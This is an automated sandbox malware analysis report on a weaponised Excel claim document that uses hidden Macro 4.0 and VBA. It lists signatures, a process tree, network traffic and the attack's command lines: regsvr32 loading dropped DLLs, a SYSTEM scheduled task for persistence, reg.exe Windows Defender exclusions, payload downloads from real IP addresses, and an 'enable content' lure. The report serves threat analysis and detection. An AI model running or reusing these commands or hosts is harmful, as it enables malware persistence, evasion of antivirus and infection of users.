Windows Analysis Report Claim-680517779-09242021.xls

Overview

General Information

Sample Name: Claim-680517779-09242021.xls
Analysis ID: 489833
MD5: a5e00f88df7d7fc328f759cd99bcd3a0
SHA1: b81aa5364f1fe9950dd0816082e9e2c7dcfa2375
SHA256: a2e451f2873b727520bef058f84303de9991e4353aa5ed3589350b7ce6e92506
Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1180 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1912 cmdline: regsvr32 -silent ..\Fiosa.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1760 cmdline: -silent ..\Fiosa.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2520 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2604 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2428 cmdline: regsvr32 -silent ..\Fiosa1.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1724 cmdline: -silent ..\Fiosa1.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 236 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
    • regsvr32.exe (PID: 804 cmdline: regsvr32 -silent ..\Fiosa2.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 152 cmdline: -silent ..\Fiosa2.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 1408 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • regsvr32.exe (PID: 2960 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2536 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 1256 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 2932 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2788 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 2320 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2940 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Claim-680517779-09242021.xls | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security |

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Fiosa.der, CommandLine: regsvr32 -silent ..\Fiosa.der, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1180, ProcessCommandLine: regsvr32 -silent ..\Fiosa.der, ProcessId: 1912
    Sigma detected: Regsvr32 Command Line Without DLL
    Source: Process startedAuthor: Florian Roth: Data: Command: -silent ..\Fiosa.der, CommandLine: -silent ..\Fiosa.der, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Fiosa.der, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1912, ProcessCommandLine: -silent ..\Fiosa.der, ProcessId: 1760

    Persistence and Installation Behavior:

    Sigma detected: Schedule system process
    Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2520, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15, ProcessId: 2604

    Jbx Signature Overview

    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.516885155.0000000002581000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000004.00000002.516667603.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.518565464.0000000002581000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.574668774.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.582087753.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,4_2_1000AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000CAEB4 FindFirstFileW,FindNextFileW,6_2_000CAEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,14_2_000CAEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,17_2_0008AEB4

    Software Vulnerabilities:

    Document exploit detected (drops PE files)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 44463.6668827546[1].dat.0.dr
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.173:80
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 13:59:28 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.6668827546.dat"
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 13:59:32 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.6668827546.dat"
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Sep 2021 13:59:50 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44463.6668827546.dat"
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44463.6668827546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: regsvr32.exe, 00000004.00000002.515971633.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.895240886.0000000002090000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574258941.00000000021B0000.00000002.00020000.sdmp, regsvr32.exe, 00000019.00000002.753582688.0000000000F20000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.518300285.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.515596084.0000000001DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575010843.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574000225.0000000001EB0000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.583955951.00000000008E0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.581362480.0000000000A50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000004.00000002.515971633.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.895240886.0000000002090000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574258941.00000000021B0000.00000002.00020000.sdmp, regsvr32.exe, 00000019.00000002.753582688.0000000000F20000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].dat

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 38 n ^l: i ffmn i a ml
    Source: Screenshot number: 4Screenshot OCR: Document is Protected 18 19 20 21 VIEW COMPLETED DOCUMENT 22 23 24 25 26 27 :: THE STEPS
    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 0Screenshot OCR: Document is Protected VIEW COMPLE ILD DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMEN
    Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 1Screenshot OCR: Document is Protected VIEW COMPLETED DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT
    Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Office process drops PE file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[3].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D6EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D2346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D1758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D4FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D6EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D2346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D1758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D4FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00094FC0
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: Claim-680517779-09242021.xlsOLE, VBA macro line: m_openAlreadyRan = True
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,4_2_1000C6C0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,4_2_1000CB77
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
    Source: Fiosa2.der.23.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.6.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.17.drStatic PE information: No import functions for PE file found
    Source: Fiosa1.der.14.drStatic PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'
    Source: Claim-680517779-09242021.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: 44463.6668827546[1].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44463.6668827546[2].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa1.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44463.6668827546[3].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa2.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\reg.exeConsole Write: The operation completed successfully.
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\Forms
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD567.tmp
    Source: classification engineClassification label: mal100.expl.evad.winXLS@33/11@0/3
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,4_2_1000D523
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
    Source: Claim-680517779-09242021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,4_2_1000ABA3
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{E4A7369A-890C-4248-9B54-92DEDB8F0D3A}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{1D70F813-44FD-4BE1-8C13-D3E897FC24C9}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{38037388-88B6-45C8-AD57-44DA063B263F}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{1D70F813-44FD-4BE1-8C13-D3E897FC24C9}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{E4A7369A-890C-4248-9B54-92DEDB8F0D3A}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{38037388-88B6-45C8-AD57-44DA063B263F}
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000A51A FindResourceA,4_2_1000A51A
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.516885155.0000000002581000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000004.00000002.516667603.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.518565464.0000000002581000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.574668774.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.582087753.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1002202C push es; ret 4_2_1002202D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10021C96 pushad ; iretd 4_2_10021C9E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 4_2_10026CF4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10026105 push edi; ret 4_2_1002611C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1002514B pushad ; iretd 4_2_1002514C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10027D58 pushfd ; ret 4_2_10027DEC
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10027679 push es; ret 4_2_100276FB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023B27 push es; retf 4_2_10023BA0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10022F6D push eax; retf 4_2_10022F97
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10022FAA push eax; retf 4_2_10022F97
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000DA00E push ebx; ret 6_2_000DA00F
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000DD485 push FFFFFF8Ah; iretd 6_2_000DD50E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000DD4B6 push FFFFFF8Ah; iretd 6_2_000DD50E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D9D5C push cs; iretd 6_2_000D9E32
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000D9E5E push cs; iretd 6_2_000D9E32
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000DBB29 push esi; iretd 6_2_000DBB2E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002202C push es; ret 9_2_1002202D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10021C96 pushad ; iretd 9_2_10021C9E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 9_2_10026CF4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10026105 push edi; ret 9_2_1002611C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002514B pushad ; iretd 9_2_1002514C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10027D58 pushfd ; ret 9_2_10027DEC
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10027679 push es; ret 9_2_100276FB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10023B27 push es; retf 9_2_10023BA0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10022F6D push eax; retf 9_2_10022F97
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10022FAA push eax; retf 9_2_10022F97
